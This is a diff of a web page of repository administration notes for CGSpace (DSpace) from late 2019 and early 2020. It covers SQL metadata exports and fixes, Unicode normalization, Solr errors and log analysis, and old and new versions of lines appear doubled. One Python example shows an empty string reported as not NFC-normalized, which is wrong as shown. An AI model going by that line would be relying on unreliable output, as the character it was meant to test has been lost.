<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable='f' AND item.in_archive='t' AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT handle, owning_collection FROM item, handle WHERE item.discoverable=&#39;f&#39; AND item.in_archive=&#39;t&#39; AND handle.resource_id = item.item_id) to /tmp/2019-12-04-CGSpace-private-items.csv WITH CSV HEADER;
COPY 48
</code></pre><h2 id="2019-12-05">2019-12-05</h2>
<ul>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers' Retreat in Nairobi, Kenya (via Skype)</li>
<li>Give <a href="https://hdl.handle.net/10568/106045">presentation about CG Core v2</a> to the MEL Developers&rsquo; Retreat in Nairobi, Kenya (via Skype)</li>
<li>Send some pull requests to the cg-core schema repository:
<ul>
<li><a href="https://github.com/AgriculturalSemantics/cg-core/pull/16">HTML syntax fixes</a></li>
@ -288,14 +288,14 @@ COPY 48
<li>I looked into creating RTF documents from HTML in Node.js and there is a library called <a href="https://www.npmjs.com/package/html-to-rtf">html-to-rtf</a> that works well, but doesn&rsquo;t support images</li>
<li>Export a list of all investors (<code>dc.description.sponsorship</code>) for Peter to look through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.sponsor&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.sponsor&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 29 GROUP BY text_value ORDER BY count DESC LIMIT 1500) to /tmp/2019-12-17-investors.csv WITH CSV HEADER;
COPY 643
</code></pre><h2 id="2019-12-18">2019-12-18</h2>
<ul>
<li>Apply the investor corrections and deletions from Peter on CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-12-17-investors-fix-112.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Peter asked about the &ldquo;Open Government Licence 3.0&rdquo; that is used by <a href="">some items</a>
<ul>
@ -304,13 +304,13 @@ $ ./delete-metadata-values.py -i /tmp/2019-12-17-investors-delete-68.csv -db dsp
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open%';
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open%&#39;;
text_value
-----------------------------
Open Government License 3.0
Open Government License 3.0
(2 rows)
dspace=# UPDATE metadatavalue SET text_value='OGL-UK-3.0' WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE '%Open Government License 3.0%';
dspace=# UPDATE metadatavalue SET text_value=&#39;OGL-UK-3.0&#39; WHERE resource_type_id=2 AND metadata_field_id=53 AND text_value LIKE &#39;%Open Government License 3.0%&#39;;
UPDATE 2
</code></pre><ul>
<li>I created a pull request to add the license and merged it to the <code>5_x-prod</code> branch (<a href="https://github.com/ilri/DSpace/pull/440">#440</a>)</li>
@ -338,12 +338,12 @@ UPDATE 2
<ul>
<li>I ran the <code>dspace cleanup</code> process on CGSpace (linode18) and had an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(179441) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(179441) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is to clear that bitstream&rsquo;s <code>primary_bitstream_id</code> reference in the <code>bundle</code> table manually:</li>
</ul>
<pre tabindex="0"><code>$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);'
<pre tabindex="0"><code>$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (179441);&#39;
UPDATE 1
</code></pre><ul>
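<li>After that the <code>dspace cleanup</code> process should run through, presumably:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
</code></pre><ul>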
<li>Adjust <a href="/cgspace-notes/cgspace-cgcorev2-migration/">CG Core v2 migration notes</a> to use <code>cg.review-status</code> instead of <code>cg.peer-reviewed</code>
View File
@ -56,7 +56,7 @@ I tweeted the CGSpace repository link
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -166,7 +166,7 @@ I tweeted the CGSpace repository link
<ul>
<li>Export a list of authors from CGSpace for Peter Ballantyne to look through and correct:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-08-authors.csv WITH CSV HEADER;
COPY 68790
</code></pre><ul>
<li>As I always have encoding issues with files Peter sends, I tried to convert it to some Windows encoding, but got an error:</li>
@ -176,10 +176,10 @@ iconv: illegal input sequence at position 104779
</code></pre><ul>
<li>According to <a href="https://www.datafix.com.au/BASHing/2018-09-13.html">this trick</a> the troublesome character is on line 5227:</li>
</ul>
<pre tabindex="0"><code>$ awk 'END {print NR&quot;: &quot;$0}' /tmp/2020-01-08-authors-windows.csv
5227: &quot;Oue
$ sed -n '5227p' /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &quot;
<pre tabindex="0"><code>$ awk &#39;END {print NR&#34;: &#34;$0}&#39; /tmp/2020-01-08-authors-windows.csv
5227: &#34;Oue
$ sed -n &#39;5227p&#39; /tmp/2020-01-08-authors.csv | xxd -c1
00000000: 22 &#34;
00000001: 4f O
00000002: 75 u
00000003: 65 e
@ -225,30 +225,30 @@ java.net.SocketTimeoutException: Read timed out
</ul>
</li>
</ul>
<pre tabindex="0"><code>In [7]: unicodedata.is_normalized('NFC', 'é')
<pre tabindex="0"><code>In [7]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;&#39;)
Out[7]: False
In [8]: unicodedata.is_normalized('NFC', 'é')
In [8]: unicodedata.is_normalized(&#39;NFC&#39;, &#39;é&#39;)
Out[8]: True
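In [9]: unicodedata.is_normalized(&#39;NFC&#39;, unicodedata.normalize(&#39;NFC&#39;, &#39;é&#39;))  # (sketch) normalizing the decomposed form fixes it
Out[9]: True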
</code></pre><h2 id="2020-01-15">2020-01-15</h2>
<ul>
<li>I added support for Unicode normalization to my <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a> tool in <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.0">v0.4.0</a></li>
<li>Generate ILRI and Bioversity subject lists for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ilri&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ilri&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 203 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-ilri-subjects.csv WITH CSV HEADER;
COPY 144
dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.bioversity&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.bioversity&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 120 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-15-bioversity-subjects.csv WITH CSV HEADER;
COPY 1325
</code></pre><ul>
<li>She will be meeting with FAO and will look over the terms to see if they can add some to AGROVOC</li>
<li>I noticed a few errors in the ILRI subjects so I fixed them locally and on CGSpace (linode18) using my <code>fix-metadata-values.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-01-15-fix-8-ilri-subjects.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.subject.ilri -m 203 -t correct -d
</code></pre><h2 id="2020-01-16">2020-01-16</h2>
<ul>
<li>Extract a list of CIAT subjects from CGSpace for Elizabeth Arnaud from Bioversity:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.ciat&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.ciat&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 122 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-16-ciat-subjects.csv WITH CSV HEADER;
COPY 35
</code></pre><ul>
<li>Start examining the 175 IITA records that Bosede originally sent in October, 2019 (201907.xls)
@ -315,15 +315,15 @@ COPY 35
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2020-01-08-fix-2302-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct -d
</code></pre><ul>
<li>Then I decided to export them again (with two author columns) so I can apply the new Unicode normalization mode I added to <a href="https://github.com/ilri/csv-metadata-quality">csv-metadata-quality</a>:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.contributor.author&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;dc.contributor.author&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 3 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-authors.csv WITH CSV HEADER;
COPY 67314
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],dc.contributor.author'
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
$ csv-metadata-quality -i /tmp/2020-01-22-authors.csv -o /tmp/authors-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],dc.contributor.author&#39;
$ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Peter asked me to send him a list of affiliations to correct
<ul>
@ -331,11 +331,11 @@ $ ./fix-metadata-values.py -i /tmp/authors-normalized.csv -db dspace -u dspace -
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, text_value as &quot;correct&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, text_value as &#34;correct&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6170
dspace=# \q
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct -n
$ csv-metadata-quality -i /tmp/2020-01-22-affiliations.csv -o /tmp/affiliations-normalized.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct -n
</code></pre><ul>
<li>I applied the corrections on DSpace Test and CGSpace, and then scheduled a full Discovery reindex for later tonight:</li>
</ul>
@ -343,7 +343,7 @@ $ ./fix-metadata-values.py -i /tmp/affiliations-normalized.csv -db dspace -u dsp
</code></pre><ul>
<li>Then I generated a new list for Peter:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.contributor.affiliation&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.contributor.affiliation&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-22-affiliations.csv WITH CSV HEADER;
COPY 6162
</code></pre><ul>
<li>Abenet said she noticed that she gets different results on AReS and Atmire Listing and Reports, for example with author &ldquo;Hung, Nguyen&rdquo;
@ -352,8 +352,8 @@ COPY 6162
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E 's/10568 ([0-9]+)/10568\/\1/' | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE '10568\/[0-9]+' hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
<pre tabindex="0"><code>$ in2csv AReS-1-801dd394-54b5-436c-ad09-4f2e25f7e62e.xlsx | sed -E &#39;s/10568 ([0-9]+)/10568\/\1/&#39; | csvcut -c Handle | grep -v Handle | sort -u &gt; hung-nguyen-ares-handles.txt
$ grep -oE &#39;10568\/[0-9]+&#39; hung-nguyen-atmire.txt | sort -u &gt; hung-nguyen-atmire-handles.txt
$ wc -l hung-nguyen-a*handles.txt
46 hung-nguyen-ares-handles.txt
56 hung-nguyen-atmire-handles.txt
@ -374,7 +374,7 @@ $ wc -l hung-nguyen-a*handles.txt
</ul>
</li>
</ul>
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &quot;23/Jan/2020:0[12345678]&quot; | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># cat /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &#34;23/Jan/2020:0[12345678]&#34; | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>The top two hosts according to the amount of data transferred are:
<ul>
@ -404,9 +404,9 @@ $ convert -thumbnail x600 10568-97925.pdf.jpg 10568-97925-thumbnail.pdf.jpg
<li>The file size is about double the old ones, but the quality is very good and it is still nowhere near ilri.org&rsquo;s 400KiB PNG!</li>
<li>Peter sent me the corrections and deletions for affiliations last night so I imported them into OpenRefine to work around the normal UTF-8 issue, ran them through csv-metadata-quality to make sure all Unicode values were normalized (NFC), then applied them on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields 'dc.date.issued,dc.date.issued[],cg.contributor.affiliation'
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p 'fuuu' -f cg.contributor.affiliation -m 211
<pre tabindex="0"><code>$ csv-metadata-quality -i ~/Downloads/2020-01-22-fix-1113-affiliations.csv -o /tmp/2020-01-22-fix-1113-affiliations.csv -u --exclude-fields &#39;dc.date.issued,dc.date.issued[],cg.contributor.affiliation&#39;
$ ./fix-metadata-values.py -i /tmp/2020-01-22-fix-1113-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211 -t correct
$ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
</code></pre><h2 id="2020-01-26">2020-01-26</h2>
<ul>
<li>Add &ldquo;Gender&rdquo; to controlled vocabulary for CRPs (<a href="https://github.com/ilri/DSpace/pull/442">#442</a>)</li>
@ -426,9 +426,9 @@ $ ./delete-metadata-values.py -i /tmp/2020-01-22-delete-36-affiliations.csv -db
</code></pre><ul>
<li>One thing worth mentioning was this syntax for extracting bits from JSON in bash using <code>jq</code>:</li>
</ul>
<pre tabindex="0"><code>$ RESPONSE=$(curl -s 'https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams')
$ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;) | .retrieveLink'
&quot;/bitstreams/172559/retrieve&quot;
<pre tabindex="0"><code>$ RESPONSE=$(curl -s &#39;https://dspacetest.cgiar.org/rest/handle/10568/103447?expand=bitstreams&#39;)
$ echo $RESPONSE | jq &#39;.bitstreams[] | select(.bundleName==&#34;ORIGINAL&#34;) | .retrieveLink&#39;
&#34;/bitstreams/172559/retrieve&#34;
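# (sketch) adding -r prints the raw string without the quotes, which is easier to reuse in later commands
$ echo $RESPONSE | jq -r &#39;.bitstreams[] | select(.bundleName==&#34;ORIGINAL&#34;) | .retrieveLink&#39;
/bitstreams/172559/retrieve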
</code></pre><h2 id="2020-01-27">2020-01-27</h2>
<ul>
<li>Bizu has been having problems when she logs into CGSpace: she can&rsquo;t see the community list on the front page
@ -439,7 +439,7 @@ $ echo $RESPONSE | jq '.bitstreams[] | select(.bundleName==&quot;ORIGINAL&quot;)
</li>
</ul>
<pre tabindex="0"><code>2020-01-27 06:02:23,681 ERROR org.dspace.app.xmlui.aspect.discovery.AbstractRecentSubmissionTransformer @ Caught SearchServiceException while retrieving recent submission for: home page
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] ': too many boolean clauses
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;read:(g0 OR e610 OR g0 OR g3 OR g5 OR g4102 OR g9 OR g4105 OR g10 OR g4107 OR g4108 OR g13 OR g4109 OR g14 OR g15 OR g16 OR g18 OR g20 OR g23 OR g24 OR g2072 OR g2074 OR g28 OR g2076 OR g29 OR g2078 OR g2080 OR g34 OR g2082 OR g2084 OR g38 OR g2086 OR g2088 OR g43 OR g2093 OR g2095 OR g2097 OR g50 OR g51 OR g2101 OR g2103 OR g62 OR g65 OR g77 OR g78 OR g2127 OR g2142 OR g2151 OR g2152 OR g2153 OR g2154 OR g2156 OR g2165 OR g2171 OR g2174 OR g2175 OR g129 OR g2178 OR g2182 OR g2186 OR g153 OR g155 OR g158 OR g166 OR g167 OR g168 OR g169 OR g2225 OR g179 OR g2227 OR g2229 OR g183 OR g2231 OR g184 OR g2233 OR g186 OR g2235 OR g2237 OR g191 OR g192 OR g193 OR g2242 OR g2244 OR g2246 OR g2250 OR g204 OR g205 OR g207 OR g208 OR g2262 OR g2265 OR g218 OR g2268 OR g222 OR g223 OR g2271 OR g2274 OR g2277 OR g230 OR g231 OR g2280 OR g2283 OR g238 OR g2286 OR g241 OR g2289 OR g244 OR g2292 OR g2295 OR g2298 OR g2301 OR g254 OR g255 OR g2305 OR g2308 OR g262 OR g2311 OR g265 OR g268 OR g269 OR g273 OR g276 OR g277 OR g279 OR g282 OR g292 OR g293 OR g296 OR g297 OR g301 OR g303 OR g305 OR g2353 OR g310 OR g311 OR g313 OR g321 OR g325 OR g328 OR g333 OR g334 OR g342 OR g343 OR g345 OR g348 OR g2409 [...] &#39;: too many boolean clauses
</code></pre><ul>
<li>Now this appears to be a Solr limit of some kind (&ldquo;too many boolean clauses&rdquo;)
<ul>
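<li>presumably this is Lucene&rsquo;s <code>maxBooleanClauses</code> limit, which defaults to 1024 and is set in Solr&rsquo;s <code>solrconfig.xml</code> as <code>&lt;maxBooleanClauses&gt;1024&lt;/maxBooleanClauses&gt;</code></li>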
@ -453,7 +453,7 @@ org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError:
<ul>
<li>Generate a list of CIP subjects for Abenet:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;cg.subject.cip&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &#34;cg.subject.cip&#34;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 127 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-28-cip-subjects.csv WITH CSV HEADER;
COPY 77
</code></pre><ul>
<li>Start looking over the IITA records from earlier this month (<a href="https://dspacetest.cgiar.org/handle/10568/106567">IITA_201907_Jan13</a>)
@ -483,33 +483,33 @@ COPY 77
<ul>
<li>Normalize about 4,500 DOI, YouTube, and SlideShare links on CGSpace that are missing HTTPS or using old format:</li>
</ul>
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://www.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'http://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'https://dx.doi.org', 'https://doi.org') WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE 'https://dx.doi.org%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.youtube.com', 'https://www.youtube.com') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.youtube.com%';
UPDATE metadatavalue SET text_value = regexp_replace(text_value, 'http://www.slideshare.net', 'https://www.slideshare.net') WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE 'http://www.slideshare.net%';
<pre tabindex="0"><code>UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://www.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;http://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;https://dx.doi.org&#39;, &#39;https://doi.org&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 220 AND text_value LIKE &#39;https://dx.doi.org%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.youtube.com&#39;, &#39;https://www.youtube.com&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.youtube.com%&#39;;
UPDATE metadatavalue SET text_value = regexp_replace(text_value, &#39;http://www.slideshare.net&#39;, &#39;https://www.slideshare.net&#39;) WHERE resource_type_id = 2 AND metadata_field_id = 219 AND text_value LIKE &#39;http://www.slideshare.net%&#39;;
</code></pre><ul>
<li>I exported a list of all of our ISSNs with item IDs so that I could fix them in OpenRefine and submit them with multi-value separators to DSpace metadata import:</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &quot;id&quot;, text_value as &quot;dc.identifier.issn&quot; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
<pre tabindex="0"><code>dspace=# \COPY (SELECT resource_id as &#34;id&#34;, text_value as &#34;dc.identifier.issn&#34; FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21) to /tmp/2020-01-29-issn.csv WITH CSV HEADER;
COPY 23339
</code></pre><ul>
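<li>For reference, DSpace&rsquo;s batch metadata import joins multiple values with the <code>||</code> separator, so a corrected row would look something like this (simplified, values invented):</li>
</ul>
<pre tabindex="0"><code>id,dc.identifier.issn
102353,0378-4290||1872-6852
</code></pre><ul>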
<li>Then, after spending two hours correcting 1,000 ISSNs, I realized that I need to normalize the <code>text_lang</code> fields in the database first, or else these will all look like changes due to the mix of &ldquo;en_US&rdquo;, NULL, etc. text langs (for both ISSN and ISBN):</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id = 2 AND metadata_field_id IN (20,21);
UPDATE 30454
</code></pre><ul>
<li>Then I realized that my initial PostgreSQL query wasn&rsquo;t so genius because if a field already has multiple values it will appear on separate lines with the same ID, so when <code>dspace metadata-import</code> sees it, the change will be removed and added, or added and removed, depending on the order it is seen!</li>
<li>A better course of action is to select the distinct ones and then correct them using <code>fix-metadata-values.py</code>&hellip;</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value as &quot;dc.identifier.issn[en_US]&quot;, count(*) FROM metadatavalue WHERE resource_type_id = 2 AND metadata_field_id = 21 GROUP BY text_value ORDER BY count DESC) to /tmp/2020-01-29-issn-distinct.csv WITH CSV HEADER;
